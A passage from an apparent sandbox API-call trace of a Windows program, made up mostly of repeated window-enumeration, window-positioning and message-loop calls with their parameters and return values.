GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.641] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.641] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.641] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.641] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.641] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.641] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.641] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.641] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.641] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.641] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.642] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.642] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.642] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.642] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.642] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.642] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.642] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.642] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.642] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.642] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.642] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.642] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.642] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.642] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.642] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.642] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.642] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.642] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.642] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.642] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.642] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.642] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.642] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.642] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.642] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.642] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.642] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.642] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.642] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.642] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.642] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.642] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.643] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.643] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.643] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.643] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.643] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.643] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.643] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.643] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.643] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.643] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.643] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.643] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.643] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.643] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.643] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.643] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.643] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.643] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.643] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.643] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.643] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.643] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.643] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.643] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.643] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.643] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.643] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.643] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.643] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.643] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.643] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.643] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.644] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.644] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.644] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.644] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.644] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.644] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.644] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.644] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.644] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.644] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.644] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.644] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.644] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.644] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.644] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.644] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.644] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.644] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.644] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.644] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.644] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.644] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.644] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.644] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.644] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.644] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.644] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.644] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.644] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.644] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.645] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.645] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.645] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.645] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.645] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.645] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.645] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.645] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.645] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.645] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.645] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.645] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.645] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.645] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.645] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.645] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.645] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.645] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.645] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.645] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.645] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.645] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.645] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.645] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.645] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.645] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.646] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.646] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.646] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.646] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.646] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.646] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.646] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.646] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.646] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.646] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.646] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.646] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.646] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.646] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.646] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.646] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.646] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.646] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.646] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.646] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.646] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.646] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.646] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.646] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.646] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.646] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.646] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.646] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.646] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.646] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.646] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.646] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.646] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.647] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.647] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.647] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.647] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.647] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.647] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.647] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.647] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.647] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.647] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.647] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.647] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.647] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.647] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.647] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.647] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.648] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.648] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.648] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.648] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.648] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.648] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.649] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.649] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.649] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.649] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.649] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.649] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.650] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.650] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.650] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.651] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.651] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.651] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.651] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.651] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.651] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.651] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.651] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.651] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.651] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.652] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.652] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.652] ShowWindow (hWnd=0x601a8, nCmdShow=1) returned 0 [0057.652] DefWindowProcA (hWnd=0x601a8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0057.653] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.653] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x601a8, Msg=0x1c, wParam=0x1, lParam=0x960) returned 0x0 [0057.672] DefWindowProcA (hWnd=0x301fc, Msg=0x1c, wParam=0x1, lParam=0x960) returned 0x0 [0057.672] GetWindowLongA (hWnd=0x401e4, nIndex=0) returned 28713116 [0057.672] DefWindowProcA (hWnd=0x601a8, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0057.672] IsIconic (hWnd=0x601a8) returned 0 [0057.672] GetFocus () returned 0x0 [0057.672] GetFocus () returned 0x0 [0057.672] IsWindowEnabled (hWnd=0x601a8) returned 1 [0057.672] GetWindowThreadProcessId (in: hWnd=0x601a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb88 [0057.672] GetCurrentThreadId () returned 0xb88 [0057.672] SetFocus (hWnd=0x601a8) returned 0x0 [0057.674] DefWindowProcA (hWnd=0x601a8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0057.674] DefWindowProcA (hWnd=0x601a8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0057.675] IsIconic (hWnd=0x601a8) returned 0 [0057.675] GetFocus () returned 0x601a8 [0057.675] DefWindowProcA (hWnd=0x601a8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0057.675] IsWindowEnabled (hWnd=0x601a8) returned 1 [0057.675] PostMessageA (hWnd=0x601a8, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0057.675] IsIconic (hWnd=0x601a8) returned 0 [0057.675] PostMessageA (hWnd=0x601a8, Msg=0x100e, wParam=0xe, lParam=0x0) returned 1 [0057.675] PostMessageA (hWnd=0x601a8, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0057.676] DefWindowProcA (hWnd=0x601a8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0057.676] IsIconic (hWnd=0x601a8) returned 0 [0057.676] IsIconic (hWnd=0x601a8) returned 0 [0057.676] GetParent (hWnd=0x601a8) returned 0x0 [0057.676] GetWindowRect (in: hWnd=0x601a8, lpRect=0x12f780 | out: lpRect=0x12f780) returned 1 [0057.676] DefWindowProcA (hWnd=0x601a8, Msg=0x47, wParam=0x0, lParam=0x12fb40) returned 0x0 [0057.676] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.676] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f7f0 | out: lpRect=0x12f7f0) returned 1 [0057.676] MapWindowPoints (in: hWndFrom=0x601a8, hWndTo=0x0, lpPoints=0x12f7f0, cPoints=0x2 | out: lpPoints=0x12f7f0) returned 17629216 [0057.676] IsWindowVisible (hWnd=0x601a8) returned 1 [0057.676] IsIconic (hWnd=0x601a8) returned 0 [0057.676] IsZoomed (hWnd=0x601a8) returned 0 [0057.676] DefWindowProcA (hWnd=0x601a8, Msg=0x5, wParam=0x0, lParam=0xb014d) returned 0x0 [0057.677] GetUserDefaultLCID () returned 0x409 [0057.677] VarBstrFromI2 (iVal=1, lcid=0x409, dwFlags=0x0, pbstrOut=0x12f670*="鰵犠滴犔麸犠ꁢ犠냿犠滴犔놹犠") returned 0x0 [0057.677] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f7c8 | out: lpRect=0x12f7c8) returned 1 [0057.677] GetWindow (hWnd=0x601a8, uCmd=0x5) returned 0x0 [0057.677] DefWindowProcA (hWnd=0x601a8, Msg=0x3, wParam=0x0, lParam=0x10d0020) returned 0x0 [0057.677] GetCurrentThreadId () returned 0xb88 [0057.677] PostThreadMessageA (idThread=0xb88, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0057.677] GetCurrentProcessId () returned 0xb84 [0057.677] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.677] IsWindow (hWnd=0x601a8) returned 1 [0057.677] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.677] IsIconic (hWnd=0x601a8) returned 0 [0057.677] GetParent (hWnd=0x601a8) returned 0x0 [0057.677] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.677] DispatchMessageA (lpMsg=0x12fe58) returned 0x0 [0057.677] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.678] IsWindow (hWnd=0x601a8) returned 1 [0057.678] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.678] IsIconic (hWnd=0x601a8) returned 0 [0057.678] GetParent (hWnd=0x601a8) returned 0x0 [0057.678] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.678] DispatchMessageA (lpMsg=0x12fe58) returned 0x0 [0057.678] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.678] IsWindow (hWnd=0x601a8) returned 1 [0057.678] GetWindowLongA (hWnd=0x601a8, nIndex=-16) returned 369098752 [0057.678] IsIconic (hWnd=0x601a8) returned 0 [0057.678] GetParent (hWnd=0x601a8) returned 0x0 [0057.678] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.678] DispatchMessageA (lpMsg=0x12fe58) returned 0x0 [0057.678] GetActiveWindow () returned 0x601a8 [0057.678] GetWindowThreadProcessId (in: hWnd=0x601a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb88 [0057.678] GetFocus () returned 0x601a8 [0057.685] PeekMessageA (in: lpMsg=0x12fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x12fe58) returned 1 [0057.685] TranslateMessage (lpMsg=0x12fe58) returned 0 [0057.685] DispatchMessageA 